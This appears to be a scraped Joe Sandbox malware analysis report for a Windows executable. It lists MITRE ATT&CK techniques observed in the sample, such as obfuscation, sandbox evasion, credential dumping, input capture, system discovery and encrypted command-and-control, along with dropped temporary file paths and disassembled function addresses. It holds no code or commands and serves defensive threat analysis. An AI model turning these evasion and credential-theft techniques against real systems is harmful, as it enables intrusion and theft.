Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6SN0DJ38zZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Hymenophyllaceae

C:\Users\user\AppData\Local\Temp\X0a-0531

C:\Users\user\AppData\Local\Temp\aut83CF.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
6SN0DJ38zZ.exe

Function 00983B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 009849A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00984E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 009E9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00983015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00983041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0098708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00983A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00983633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00983766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 013FD0C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 009839D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 013FCE30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 163
fileCOMMON

Function 0098407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre